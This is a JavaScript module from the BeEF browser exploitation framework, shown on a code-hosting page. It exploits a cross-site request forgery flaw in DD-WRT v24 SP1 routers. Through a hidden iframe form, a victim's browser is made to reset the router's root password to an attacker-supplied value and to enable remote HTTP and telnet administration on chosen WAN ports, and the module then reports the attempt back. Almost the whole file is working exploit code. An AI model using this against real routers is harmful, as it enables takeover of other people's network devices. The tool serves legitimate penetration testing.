CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
    var host     = '<%= @host %>';
9
    var password = '<%= @password %>';
10
    var port     = '<%= @port %>';
11
    var telnet   = '<%= @telnet %>';
12
    var path     = 'apply.cgi';
13

14
    if (!host.match(/\/$/))
15
        host += '/';
16

17
    var ddwrt_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
18
        host + path,
19
        'POST', 'application/x-www-form-urlencoded', [
20
        { 'type': 'hidden', 'name': 'submit_button', 'value': 'Management' },
21
        { 'type': 'hidden', 'name': 'action', 'value': 'ApplyTake' },
22
        { 'type': 'hidden', 'name': 'change_action', 'value': '' },
23
        { 'type': 'hidden', 'name': 'submit_type', 'value': '' },
24
        { 'type': 'hidden', 'name': 'commit', 'value': '1' },
25
        { 'type': 'hidden', 'name': 'PasswdModify', 'value': '0' },
26
        { 'type': 'hidden', 'name': 'remote_mgt_https', 'value': '' },
27
        { 'type': 'hidden', 'name': 'http_enable', 'value': '1' },
28
        { 'type': 'hidden', 'name': 'info_passwd', 'value': '0' },
29
        { 'type': 'hidden', 'name': 'https_enable', 'value': '' },
30
        { 'type': 'hidden', 'name': 'http_username', 'value': 'root' },
31
        { 'type': 'hidden', 'name': 'http_passwd', 'value': password },
32
        { 'type': 'hidden', 'name': 'http_passwdConfirm', 'value': password },
33
        { 'type': 'hidden', 'name': '_http_enable', 'value': '1' },
34
        { 'type': 'hidden', 'name': 'refresh_time', 'value': '3' },
35
        { 'type': 'hidden', 'name': 'status_auth', 'value': '1' },
36
        { 'type': 'hidden', 'name': 'maskmac', 'value': '1' },
37
        { 'type': 'hidden', 'name': 'remote_management', 'value': '1' },
38
        { 'type': 'hidden', 'name': 'http_wanport', 'value': port },
39
        { 'type': 'hidden', 'name': 'remote_mgt_telnet', 'value': '1' },
40
        { 'type': 'hidden', 'name': 'telnet_wanport', 'value': telnet },
41
        { 'type': 'hidden', 'name': 'boot_wait', 'value': 'on' },
42
        { 'type': 'hidden', 'name': 'cron_enable', 'value': '1' },
43
        { 'type': 'hidden', 'name': 'cron_jobs', 'value': '' },
44
        { 'type': 'hidden', 'name': 'loopback_enable', 'value': '1' },
45
        { 'type': 'hidden', 'name': 'nas_enable', 'value': '1' },
46
        { 'type': 'hidden', 'name': 'resetbutton_enable', 'value': '1' },
47
        { 'type': 'hidden', 'name': 'zebra_enable', 'value': '1' },
48
        { 'type': 'hidden', 'name': 'ip_conntrack_max', 'value': '512' },
49
        { 'type': 'hidden', 'name': 'ip_conntrack_tcp_timeouts', 'value': '3600' },
50
        { 'type': 'hidden', 'name': 'ip_conntrack_udp_timeouts', 'value': '120' },
51
        { 'type': 'hidden', 'name': 'overclocking', 'value': '200' }
52
    ]);
53

54
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
55

56
    setTimeout(function() { document.body.removeChild(ddwrt_iframe_<%= @command_id %>) }, 15 * 1000);
57
});
58

59
Product

Resources

Company
